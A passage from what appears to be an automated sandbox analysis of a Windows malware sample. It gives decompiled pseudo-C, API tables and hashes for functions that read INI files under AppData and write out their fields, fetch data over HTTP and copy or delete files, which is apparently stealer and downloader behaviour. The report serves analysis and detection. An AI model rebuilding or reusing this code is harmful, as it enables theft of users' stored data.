											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E004082E1();
					return 0;
				}
			}

0x00408594
0x004085a2
0x004085a6
0x004085c6
0x004085d3
0x004085e0
0x004085e5
0x004085e7
0x004085ee
0x004085f4
0x004085f9
0x00408611
0x00408616
0x0040861b
0x00408620
0x0040862a
0x00408630
0x004085fb
0x004085fb
0x00408602
0x00000000
0x00408604
0x00408604
0x0040860b
0x00000000
0x0040860d
0x0040860d
0x0040860f
0x00000000
0x00000000
0x0040860f
0x0040860b
0x00408602
0x00408635
0x0040863b
0x00408640
0x00408643
0x0040870a
0x0040870a
0x0040870a
0x00408649
0x00408650
0x00408652
0x00408654
0x00000000
0x0040865a
0x0040865a
0x00408665
0x0040866b
0x00408673
0x00408678
0x00408680
0x00408685
0x0040868d
0x00408694
0x00408699
0x0040869e
0x004086a0
0x00408705
0x00408705
0x00000000
0x004086a2
0x004086a2
0x004086b5
0x004086b7
0x004086bc
0x004086bf
0x00000000
0x004086c1
0x004086cd
0x004086d1
0x004086d3
0x00000000
0x004086d5
0x004086e6
0x004086e8
0x00000000
0x004086ea
0x004086ea
0x004086ec
0x004086ed
0x004086f4
0x004086fa
0x004086fe
0x00408702
0x00408702
0x004086e8
0x004086d3
0x004086bf
0x004086a0
0x00408654
0x0040870e
0x004085a8
0x004085a8
0x004085b0
0x004085b0

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00407098), ref: 0040859C
__mtterm.LIBCMT ref: 004085A8

Part of subcall function 004082E1: DecodePointer.KERNEL32(00000005,0040870A,?,00407098), ref: 004082F2
Part of subcall function 004082E1: TlsFree.KERNEL32(00000004,0040870A,?,00407098), ref: 0040830C
Part of subcall function 004082E1: DeleteCriticalSection.KERNEL32(00000000,00000000,77E4F3A0,?,0040870A,?,00407098), ref: 0040B12C
Part of subcall function 004082E1: _free.LIBCMT ref: 0040B12F
Part of subcall function 004082E1: DeleteCriticalSection.KERNEL32(00000004,77E4F3A0,?,0040870A,?,00407098), ref: 0040B156

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004085BE
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004085CB
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004085D8
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004085E5
TlsAlloc.KERNEL32(?,00407098), ref: 00408635
TlsSetValue.KERNEL32(00000000,?,00407098), ref: 00408650
__init_pointers.LIBCMT ref: 0040865A
EncodePointer.KERNEL32(?,00407098), ref: 0040866B
EncodePointer.KERNEL32(?,00407098), ref: 00408678
EncodePointer.KERNEL32(?,00407098), ref: 00408685
EncodePointer.KERNEL32(?,00407098), ref: 00408692
DecodePointer.KERNEL32(00408465,?,00407098), ref: 004086B3
__calloc_crt.LIBCMT ref: 004086C8
DecodePointer.KERNEL32(00000000,?,00407098), ref: 004086E2
GetCurrentThreadId.KERNEL32 ref: 004086F4

Strings

FlsFree, xrefs: 004085DA
`ext, xrefs: 0040861B
FlsGetValue, xrefs: 004085C0
FlsAlloc, xrefs: 004085B8
KERNEL32.DLL, xrefs: 00408597
FlsSetValue, xrefs: 004085CD

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL$`ext
API String ID: 3698121176-3547465748
Opcode ID: e859809d022cf060a4734246ee46259a085ef568b49adb2bc0e7320be927cf26
Instruction ID: 2ba049c44f2d370ad7b90371e198975f95760fcba2a476707755bf87411b7394
Opcode Fuzzy Hash: e859809d022cf060a4734246ee46259a085ef568b49adb2bc0e7320be927cf26
Instruction Fuzzy Hash: D3319A35A04211DBCB21AFB5BE09A163BA4AB60728B24553FE444A32F1EF788445CF5E

Uniqueness

Uniqueness Score: -1.00%

Function 0041CDE0, Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0041CDE0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				CHAR* _v8;
				signed int _v12;
				char _v4372;
				char _v4636;
				intOrPtr _v4640;
				intOrPtr _v4644;
				intOrPtr _v4648;
				char* _v4652;
				intOrPtr _v4656;
				intOrPtr _v4660;
				char _v4664;
				char _v4668;
				intOrPtr _v4672;
				intOrPtr _v4676;
				intOrPtr* _v4680;
				intOrPtr _v4684;
				char _v4685;
				intOrPtr _v4692;
				intOrPtr* _v4696;
				intOrPtr _v4700;
				char _v4701;
				intOrPtr _v4708;
				intOrPtr* _v4712;
				intOrPtr _v4716;
				char _v4717;
				intOrPtr _v4724;
				void* __ebp;
				signed int _t114;
				intOrPtr _t122;
				intOrPtr _t126;
				intOrPtr _t136;
				intOrPtr _t137;
				intOrPtr _t139;
				intOrPtr* _t142;
				intOrPtr _t148;
				void* _t162;
				intOrPtr _t163;
				intOrPtr _t172;
				intOrPtr _t188;
				intOrPtr _t193;
				intOrPtr _t201;
				intOrPtr _t205;
				intOrPtr _t208;
				intOrPtr* _t209;
				intOrPtr _t213;
				intOrPtr _t216;
				intOrPtr _t218;
				intOrPtr _t223;
				intOrPtr _t227;
				intOrPtr* _t228;
				intOrPtr _t241;
				signed int _t246;
				void* _t247;
				void* _t249;
				void* _t250;
				void* _t252;
				void* _t258;
				void* _t260;
				void* _t267;
				void* _t272;

				_t245 = __esi;
				_t244 = __edi;
				_t182 = __ebx;
				E00412A40(0x1270);
				_t114 =  *0x4301f4; // 0x3b2bc12f
				_v12 = _t114 ^ _t246;
				 *0x432868(0, 0x1a, 0, 0,  &_v4636);
				_t216 =  *0x4324c4; // 0xc16c80
				E00406125(_t216, _a12, 4, _t216,  &_v4636);
				_t217 =  &_v4372;
				GetPrivateProfileSectionNamesA( &_v4372, 0x1000, _a12);
				_v8 =  &_v4372;
				_t122 =  *0x432738(_a12);
				_t249 = _t247 + 0x14;
				if(_t122 == 0) {
					_push(0x43270c);
					_t122 = E0040611A();
					_t250 = _t249 + 4;
					_v4640 = _t122;
					if(_v4640 < 0x20) {
						_push(0);
						_t218 =  *0x4326f0; // 0xc16a88
						_v4648 = E0041A3B0(_a12, _t218);
						_v4668 = 0;
						_v4664 = 0;
						_t188 =  *0x43264c; // 0xc16728
						_t217 = _v4648;
						_t126 = E004055AB(_v4648, _t188);
						_t252 = _t250 + 0x14;
						_v4660 = _t126;
						_t279 = _v4660;
						if(_v4660 != 0) {
							_push(2);
							_push(0);
							_push(_v4660);
							E004066BB(__ebx, _t217, __edi, __esi, _t279);
							_push(_v4660);
							_v4668 = E004065CC(__ebx, __edi, __esi, _t279);
							_push(0);
							E004066BB(__ebx, _v4660, __edi, __esi, _t279);
							_v4676 = E00404349(_t244, _t245, _t279, _v4668 + 1, _v4660, 0);
							_v4644 = _v4676;
							E0040641B(_v4644, 1, _v4668, _v4660);
							_t217 =  *0x432188; // 0xc16828
							_t136 =  *0x4325d0; // 0xc16c20
							_t137 = E004055AB(_t136, _t217);
							_t258 = _t252 + 0x38;
							_v4672 = _t137;
							if(_v4672 != 0) {
								while(1) {
									_t193 =  *0x4321b0; // 0xc16a40
									_t217 = _v4644;
									_t139 = E00402D10(_v4644, _t193);
									_t260 = _t258 + 8;
									_v4656 = _t139;
									if(_v4656 == 0) {
										break;
									}
									_t142 =  *0x4321b0; // 0xc16a40
									_v4680 = _t142;
									_v4684 = _v4680 + 1;
									do {
										_v4685 =  *_v4680;
										_v4680 = _v4680 + 1;
										_t283 = _v4685;
									} while (_v4685 != 0);
									_v4692 = _v4680 - _v4684;
									_t49 = _v4692 + 3; // 0x3
									_v4656 = _v4656 + _t49;
									_t223 =  *0x432394; // 0xc169b0
									_v4652 = E00402D10(_v4656, _t223) - 3;
									 *_v4652 = 0;
									_push(_a4);
									_t148 =  *0x43239c; // 0xc16ba8
									_push(_t148);
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_push("\n");
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_push(_a8);
									_t201 =  *0x4323b8; // 0xc16c38
									_push(_t201);
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_push("\n");
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_push(_v4656);
									_t227 =  *0x432258; // 0xc16bd8
									_push(_t227);
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_push("\n");
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_t267 = _t260 + 0x44;
									_t228 =  *0x432548; // 0xc16570
									_v4696 = _t228;
									_v4700 = _v4696 + 1;
									do {
										_v4701 =  *_v4696;
										_v4696 = _v4696 + 1;
										_t285 = _v4701;
									} while (_v4701 != 0);
									_v4708 = _v4696 - _v4700;
									_t205 =  *0x432548; // 0xc16570
									_t162 = E00402D10(_v4652 + 1, _t205);
									_t77 = _v4708 + 3; // 0x3
									_v4656 = _t162 + _t77;
									_t163 =  *0x432544; // 0xc163d0
									_v4652 = E00402D10(_v4656, _t163) - 3;
									 *_v4652 = 0;
									_push(E0041C900(_t182, _t244, _t245, _v4656));
									_t208 =  *0x4322b4; // 0xc168d8
									_push(_t208);
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t285);
									_push("\n");
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t285);
									_t272 = _t267 + 0x28;
									_t209 =  *0x432544; // 0xc163d0
									_v4712 = _t209;
									_v4716 = _v4712 + 1;
									do {
										_v4717 =  *_v4712;
										_v4712 = _v4712 + 1;
										_t287 = _v4717;
									} while (_v4717 != 0);
									_v4724 = _v4712 - _v4716;
									_t172 =  *0x432544; // 0xc163d0
									_v4656 = E00402D10(_v4652 + 1, _t172) + _v4724 + 3;
									_t213 =  *0x432664; // 0xc16798
									_v4652 = E00402D10(_v4656, _t213) - 3;
									 *_v4652 = 0;
									_push(E0041C900(_t182, _t244, _t245, _v4656));
									_t241 =  *0x4326c4; // 0xc16aa0
									_push(_t241);
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t287);
									_push("\n\n");
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t287);
									_t258 = _t272 + 0x28;
									_v4644 = _v4652 + 1;
								}
								_push(_v4672);
								E00405EA3(_t182, _t217, _t244, _t245, __eflags);
								_t258 = _t260 + 4;
							}
							_push(_v4660);
							E00405EA3(_t182, _t217, _t244, _t245, __eflags);
						}
						_t122 =  *0x432764();
					}
				}
				__eflags = _v12 ^ _t246;
				return E00404354(_t122, _t182, _v12 ^ _t246, _t217, _t244, _t245);
			}

0x0041cde0
0x0041cde0
0x0041cde0
0x0041cde8
0x0041cded
0x0041cdf4
0x0041ce06
0x0041ce13
0x0041ce20
0x0041ce31
0x0041ce38
0x0041ce44
0x0041ce4b
0x0041ce51
0x0041ce56
0x0041ce5c
0x0041ce61
0x0041ce66
0x0041ce69
0x0041ce76
0x0041ce7c
0x0041ce7e
0x0041ce91
0x0041ce97
0x0041cea1
0x0041ceab
0x0041ceb2
0x0041ceb9
0x0041cebe
0x0041cec1
0x0041cec7
0x0041cece
0x0041ced4
0x0041ced6
0x0041cede
0x0041cedf
0x0041ceed
0x0041cef6
0x0041cefc
0x0041cf07
0x0041cf21
0x0041cf2d
0x0041cf4a
0x0041cf52
0x0041cf59
0x0041cf5f
0x0041cf64
0x0041cf67
0x0041cf74
0x0041cf7a
0x0041cf7a
0x0041cf81
0x0041cf88
0x0041cf8d
0x0041cf90
0x0041cf9d
0x00000000
0x00000000
0x0041cfa3
0x0041cfa8
0x0041cfb7
0x0041cfbd
0x0041cfc5
0x0041cfcb
0x0041cfd2
0x0041cfd2
0x0041cfe7
0x0041cff9
0x0041cffd
0x0041d003
0x0041d01c
0x0041d028
0x0041d02e
0x0041d02f
0x0041d034
0x0041d03b
0x0041d03c
0x0041d044
0x0041d04f
0x0041d050
0x0041d05b
0x0041d05c
0x0041d062
0x0041d069
0x0041d06a
0x0041d072
0x0041d07d
0x0041d07e
0x0041d08c
0x0041d08d
0x0041d093
0x0041d09a
0x0041d09b
0x0041d0a3
0x0041d0ae
0x0041d0af
0x0041d0b4
0x0041d0b7
0x0041d0bd
0x0041d0cc
0x0041d0d2
0x0041d0da
0x0041d0e0
0x0041d0e7
0x0041d0e7
0x0041d0fc
0x0041d102
0x0041d113
0x0041d121
0x0041d125
0x0041d12b
0x0041d143
0x0041d14f
0x0041d161
0x0041d162
0x0041d168
0x0041d16f
0x0041d170
0x0041d178
0x0041d183
0x0041d184
0x0041d189
0x0041d18c
0x0041d192
0x0041d1a1
0x0041d1a7
0x0041d1af
0x0041d1b5
0x0041d1bc
0x0041d1bc
0x0041d1d1
0x0041d1d7
0x0041d1f9
0x0041d1ff
0x0041d218
0x0041d224
0x0041d236
0x0041d237
0x0041d23d
0x0041d244
0x0041d245
0x0041d24d
0x0041d258
0x0041d259
0x0041d25e
0x0041d26a
0x0041d26a
0x0041d27b
0x0041d27c
0x0041d281
0x0041d281
0x0041d28a
0x0041d28b
0x0041d290
0x0041d293
0x0041d293
0x0041ce76
0x0041d29c
0x0041d2a6

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041CE06
__snprintf.LIBCMT ref: 0041CE20
GetPrivateProfileSectionNamesA.KERNEL32(?,00001000,?), ref: 0041CE38

Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8

_fseek.LIBCMT ref: 0041CEDF
_fseek.LIBCMT ref: 0041CF07

Part of subcall function 004066BB: __lock_file.LIBCMT ref: 004066FC
Part of subcall function 004066BB: __fseek_nolock.LIBCMT ref: 0040670D

__fread_nolock.LIBCMT ref: 0041CF4A
_fprintf.LIBCMT ref: 0041D03C
_fprintf.LIBCMT ref: 0041D050
_fprintf.LIBCMT ref: 0041D06A
_fprintf.LIBCMT ref: 0041D07E
_fprintf.LIBCMT ref: 0041D09B
_fprintf.LIBCMT ref: 0041D0AF
_fprintf.LIBCMT ref: 0041D170
_fprintf.LIBCMT ref: 0041D184
_fprintf.LIBCMT ref: 0041D245
_fprintf.LIBCMT ref: 0041D259

Strings

, xrefs: 0041CE6F

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$_fseek$FolderNamesPathPrivateProfileSection__fread_nolock__fseek_nolock__fsopen__lock_file__snprintf
String ID:
API String ID: 964051248-3916222277
Opcode ID: b0134b1bbbc47938beea79b5c8d69063b089505a3bd519f0597257b1a0dd5c9e
Instruction ID: 8bb85de0f22b289aae1df3d9185be0b70f7552bc5c52eba9c7a08788fcfb9ccc
Opcode Fuzzy Hash: b0134b1bbbc47938beea79b5c8d69063b089505a3bd519f0597257b1a0dd5c9e
Instruction Fuzzy Hash: 87D171B5E00218AFCB24EF64DD81ADEB7B5AB48304F0441E9E509E7391D7789EA4CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041C0CA, Relevance: 19.6, APIs: 13, Instructions: 144COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000100,00000000,00000000), ref: 0041C140
_fprintf.LIBCMT ref: 0041C154
_fprintf.LIBCMT ref: 0041C168

Part of subcall function 004055C2: __lock_file.LIBCMT ref: 00405609
Part of subcall function 004055C2: __stbuf.LIBCMT ref: 0040568D
Part of subcall function 004055C2: __output_l.LIBCMT ref: 0040569D
Part of subcall function 004055C2: __ftbuf.LIBCMT ref: 004056A7

_fprintf.LIBCMT ref: 0041C185
_fprintf.LIBCMT ref: 0041C199
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041C1C4
_fprintf.LIBCMT ref: 0041C1DE
_fprintf.LIBCMT ref: 0041C1F2
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041C21D
_fprintf.LIBCMT ref: 0041C238
_fprintf.LIBCMT ref: 0041C24C
_fprintf.LIBCMT ref: 0041C2A7
_fprintf.LIBCMT ref: 0041C2BB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041C2F4
_fprintf.LIBCMT ref: 0041C30F
_fprintf.LIBCMT ref: 0041C323
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000100,00000000,00000000), ref: 0041C389
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000100,00000000,00000000), ref: 0041C407
_fprintf.LIBCMT ref: 0041C41A
_fprintf.LIBCMT ref: 0041C42E
_fprintf.LIBCMT ref: 0041C44B
_fprintf.LIBCMT ref: 0041C45F
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041C48A
_fprintf.LIBCMT ref: 0041C4A5
_fprintf.LIBCMT ref: 0041C4B9
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041C4E4
_fprintf.LIBCMT ref: 0041C4FE
_fprintf.LIBCMT ref: 0041C512
_fprintf.LIBCMT ref: 0041C56B
_fprintf.LIBCMT ref: 0041C57F
FreeLibrary.KERNEL32(00000000), ref: 0041C633

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$ByteCharMultiWide$FreeLibrary__ftbuf__lock_file__output_l__stbuf
String ID:
API String ID: 2176516221-0
Opcode ID: 8b9617d5ee5680184114d5a49bdd7cb62b92eda55f8ed9ff2480c090733e5350
Instruction ID: 366089455bcf1858987bfbc5b8aa69005b404d304fa8a25bad335349cff2d88f
Opcode Fuzzy Hash: 8b9617d5ee5680184114d5a49bdd7cb62b92eda55f8ed9ff2480c090733e5350
Instruction Fuzzy Hash: 6651A3B1A42218ABEB64DB50DD81F9AB3B9EB58701F1041D9F70D672C0D674EE818F6C

Uniqueness

Uniqueness Score: -1.00%

Function 00422200, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 180
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00422200(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char* _v8;
				char _v16;
				char* _v20;
				signed int _v24;
				signed int _v28;
				char _v56;
				char _v84;
				void* _v88;
				void _v92;
				void* _v96;
				void* _v100;
				int _v104;
				long _v108;
				char* _v112;
				intOrPtr _v116;
				signed int _t77;
				signed int _t78;
				long _t93;
				void* _t116;
				intOrPtr _t128;
				intOrPtr _t138;
				void* _t154;
				void* _t155;
				signed int _t156;
				void* _t160;

				_t155 = __esi;
				_t154 = __edi;
				_t116 = __ebx;
				_push(0xffffffff);
				_push(E00426667);
				_push( *[fs:0x0]);
				_t77 =  *0x4301f4; // 0x3b2bc12f
				_t78 = _t77 ^ _t156;
				_v28 = _t78;
				_push(_t78);
				 *[fs:0x0] =  &_v16;
				_v116 = __ecx;
				E004011C0( &_v56, _a4);
				_v8 = 0;
				_v20 = E00401EE0( &_v56, "http://", 0);
				_t160 = _v20 -  *0x42d8c4; // 0xffffffff
				if(_t160 != 0) {
					E00401B90( &_v56, _v20, 7);
				}
				_v20 = E00401370( &_v56, 0x2f, 0);
				E00401F30( &_v56,  &_v84, 0, _v20);
				_v8 = 1;
				E00401B90( &_v56, 0, _v20);
				_v20 = 0;
				E00401E10(_v116 + 0x44, 0x104, _a4, 0x103);
				_v24 = 0;
				if( *(_v116 + 0x38) != 0) {
					_v24 = _v24 | 0x00000003;
				}
				_t128 = _v116;
				_t150 =  *(_t128 + 0xc);
				_v88 = InternetOpenA( *(_t128 + 0xc), _v24,  *(_v116 + 0x38), 0, 0);
				if(_v88 != 0) {
					_v92 = 1;
					InternetSetOptionA(_v88, 0x41,  &_v92, 4);
					_t138 = _v116;
					_t150 =  *(_t138 + 0x3c);
					_v96 = InternetConnectA(_v88, E00401330( &_v84), 0x50,  *(_t138 + 0x3c),  *(_v116 + 0x40), 3, 0, 1);
					if(_v96 != 0) {
						_v100 = HttpOpenRequestA(_v96, "GET", E00401330( &_v56), 0, 0, 0, 0x400000, 1);
						if(_v100 != 0) {
							E004217A0(_t116, _v116, _t154, _t155, _v100);
							_v104 = HttpSendRequestA(_v100, 0, 0, 0, 0);
							if(_v104 != 0) {
								_v20 = E00421CF0(_t116, _v116, _t154, _t155, _v100);
							}
							_t150 = _v100;
							InternetCloseHandle(_v100);
						}
						InternetCloseHandle(_v96);
					}
					InternetCloseHandle(_v88);
				}
				if(_v20 <= 0) {
					_v112 = 0;
					_v8 = 0;
					E004012D0( &_v84);
					_v8 = 0xffffffff;
					E004012D0( &_v56);
					_t93 = _v112;
				} else {
					_v108 = 1;
					_v8 = 0;
					E004012D0( &_v84);
					_v8 = 0xffffffff;
					E004012D0( &_v56);
					_t93 = _v108;
				}
				 *[fs:0x0] = _v16;
				return E00404354(_t93, _t116, _v28 ^ _t156, _t150, _t154, _t155);
			}

0x00422200
0x00422200
0x00422200
0x00422203
0x00422205
0x00422210
0x00422214
0x00422219
0x0042221b
0x0042221e
0x00422222
0x00422228
0x00422232
0x00422237
0x0042224d
0x00422253
0x00422259
0x00422264
0x00422264
0x00422275
0x00422285
0x0042228a
0x00422297
0x0042229c
0x004222b8
0x004222c0
0x004222ce
0x004222d6
0x004222d6
0x004222e8
0x004222eb
0x004222f5
0x004222fc
0x00422302
0x00422315
0x00422328
0x0042232b
0x00422344
0x0042234b
0x00422372
0x00422379
0x00422382
0x00422399
0x004223a0
0x004223ae
0x004223ae
0x004223b1
0x004223b5
0x004223b5
0x004223bf
0x004223bf
0x004223c9
0x004223c9
0x004223d3
0x004223fe
0x00422405
0x0042240c
0x00422411
0x0042241b
0x00422420
0x004223d5
0x004223d5
0x004223dc
0x004223e3
0x004223e8
0x004223f2
0x004223f7
0x004223f7
0x00422443
0x00422458

APIs

__mbstowcs_l.LIBCMTD ref: 004222B8
InternetOpenA.WININET(?,00000000,?,00000000,00000000), ref: 004222EF
InternetSetOptionA.WININET(00000000,00000041,00000001,00000004), ref: 00422315
InternetConnectA.WININET(00000000,00000000,00000050,?,?,00000003,00000000,00000001), ref: 0042233E
HttpOpenRequestA.WININET(00000000,GET,00000000,00000000,00000000,00000000,00400000,00000001), ref: 0042236C
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00422393
InternetCloseHandle.WININET(00000000), ref: 004223B5
InternetCloseHandle.WININET(00000000), ref: 004223BF
InternetCloseHandle.WININET(00000000), ref: 004223C9

Part of subcall function 00421CF0: InternetSetFilePointer.WININET(0042280B,00000000,00000000,00000000,00000000), ref: 00421D94
Part of subcall function 00421CF0: InternetReadFile.WININET(0042280B,?,000003E8,00000000), ref: 00421DBA

Strings

GET, xrefs: 00422363
http://, xrefs: 00422240

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenRequest$ConnectOptionPointerReadSend__mbstowcs_l
String ID: GET$http://
API String ID: 3227830049-1632879366
Opcode ID: 3594bfadbcd0b2e168513e83fb03b8f3dc0df1efc696576d5205c50443355d01
Instruction ID: 610c6cca322e3e47b99bbd2dde3902dd4f332298f4cea05fed20cb52f9e14152
Opcode Fuzzy Hash: 3594bfadbcd0b2e168513e83fb03b8f3dc0df1efc696576d5205c50443355d01
Instruction Fuzzy Hash: 0A711670A00218ABDB14EBE4DD95BEEB7B5BF04704F60412DF502BB2D1DBB86945CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041BB00, Relevance: 18.3, APIs: 12, Instructions: 257stringfileCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0041BB1F
lstrcat.KERNEL32(?,00C16718), ref: 0041BB33
CopyFileA.KERNEL32(?,?,00000001), ref: 0041BB46
_memset.LIBCMT ref: 0041BB5A
wsprintfA.USER32 ref: 0041BB78
DeleteFileA.KERNEL32(?), ref: 0041BECC

Part of subcall function 004055AB: __fsopen.LIBCMT ref: 004055B8

lstrcat.KERNEL32(?,00C167A8), ref: 0041BD45
lstrcat.KERNEL32(?,00C167B8), ref: 0041BD65
lstrcat.KERNEL32(?,00C167A8), ref: 0041BE16
lstrcat.KERNEL32(?,00C167B8), ref: 0041BE36
_fprintf.LIBCMT ref: 0041BE7B
_fprintf.LIBCMT ref: 0041BE8F

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memsetwsprintf
String ID:
API String ID: 3836584492-0
Opcode ID: 04b5c87693709f99ce2bd01f3d8e9ad4fe9a8a8fd04c4f6e169bdc3827cc32a1
Instruction ID: 98873328e225f771882efd5b2253d5c8ca372c8d610c10d87794e9511f24b4a7
Opcode Fuzzy Hash: 04b5c87693709f99ce2bd01f3d8e9ad4fe9a8a8fd04c4f6e169bdc3827cc32a1
Instruction Fuzzy Hash: D7B13EB1E00258AFCB24DF64ED88BDAB7B5EB48301F1482E9E509A7250D7759EC4CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00420A30, Relevance: 18.1, APIs: 12, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00420A30(void* __ebx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				char _v20276;
				char _v20540;
				CHAR* _v20544;
				char _v20548;
				intOrPtr _v20552;
				signed int _t36;
				CHAR* _t45;
				CHAR* _t52;
				void* _t75;
				signed int _t76;
				void* _t77;
				void* _t82;

				_t75 = __esi;
				_t74 = __edi;
				_t60 = __ebx;
				E00412A40(0x5044);
				_t36 =  *0x4301f4; // 0x3b2bc12f
				_v12 = _t36 ^ _t76;
				E004091C0( &_v20276, 0, 0x4e20);
				E004091C0( &_v276, 0, 0x104);
				E004091C0( &_v20540, 0, 0x104);
				wsprintfA( &_v20276, _a4);
				_t71 =  &_v20548;
				_t45 = E0040540F(__ebx,  &_v20548, __edi,  &_v20276, ";",  &_v20548);
				_t82 = _t77 + 0x38;
				_v20544 = _t45;
				_v8 = 1;
				while(_v20544 != 0) {
					_v20552 = _v8;
					if(_v20552 == 1) {
						_t71 = _v20544;
						wsprintfA( &_v276, _v20544);
						_t82 = _t82 + 8;
					} else {
						if(_v20552 == 2) {
							_t71 =  &_v20540;
							wsprintfA( &_v20540, _v20544);
							_t82 = _t82 + 8;
						} else {
							if(_v20552 == 3) {
								E004207B0(_t60, _t74, _t75,  &_v276,  &_v20540, _v20544);
								E004091C0( &_v276, 0, 0x104);
								E004091C0( &_v20540, 0, 0x104);
								_t82 = _t82 + 0x24;
								_t71 = _a8;
								SetCurrentDirectoryA(_a8);
								_v8 = 0;
							}
						}
					}
					_v8 = _v8 + 1;
					_t52 = E0040540F(_t60, _t71, _t74, 0, ";",  &_v20548);
					_t82 = _t82 + 0xc;
					_v20544 = _t52;
				}
				return E00404354(E004091C0( &_v20276, 0, 0x4e20), _t60, _v12 ^ _t76,  &_v20276, _t74, _t75);
			}

0x00420a30
0x00420a30
0x00420a30
0x00420a38
0x00420a3d
0x00420a44
0x00420a55
0x00420a6b
0x00420a81
0x00420a94
0x00420a9d
0x00420ab0
0x00420ab5
0x00420ab8
0x00420abe
0x00420ac5
0x00420ad5
0x00420ae2
0x00420afb
0x00420b09
0x00420b0f
0x00420ae4
0x00420aeb
0x00420b1b
0x00420b22
0x00420b28
0x00420aed
0x00420af4
0x00420b42
0x00420b58
0x00420b6e
0x00420b73
0x00420b76
0x00420b7a
0x00420b80
0x00420b80
0x00420af4
0x00420aeb
0x00420b8d
0x00420b9e
0x00420ba3
0x00420ba6
0x00420ba6
0x00420bd4

APIs

_memset.LIBCMT ref: 00420A55
_memset.LIBCMT ref: 00420A6B
_memset.LIBCMT ref: 00420A81
wsprintfA.USER32 ref: 00420A94
_strtok_s.LIBCMT ref: 00420AB0
wsprintfA.USER32 ref: 00420B09
wsprintfA.USER32 ref: 00420B22
_strtok_s.LIBCMT ref: 00420B9E
_memset.LIBCMT ref: 00420BBF

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$wsprintf$_strtok_s
String ID:
API String ID: 2217037046-0
Opcode ID: 5b73ba11990efded92794ba239d3f653404a1504c2da1255940934dc07b24593
Instruction ID: 0af7a6de36b6c7e90aa8e6a8f51bfe9d77b64d07dc96b163082216e34aae25e5
Opcode Fuzzy Hash: 5b73ba11990efded92794ba239d3f653404a1504c2da1255940934dc07b24593
Instruction Fuzzy Hash: E64188F1E10218EBDB24EB50EC46BDE7378AF44709F4440EAE7096A182D6745F88CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004202A0, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 169
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004202A0(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, char* _a4, intOrPtr _a8, CHAR* _a12, char* _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				intOrPtr _v284;
				char _v844;
				char* _v848;
				char* _v852;
				char _v853;
				char _v854;
				char* _v860;
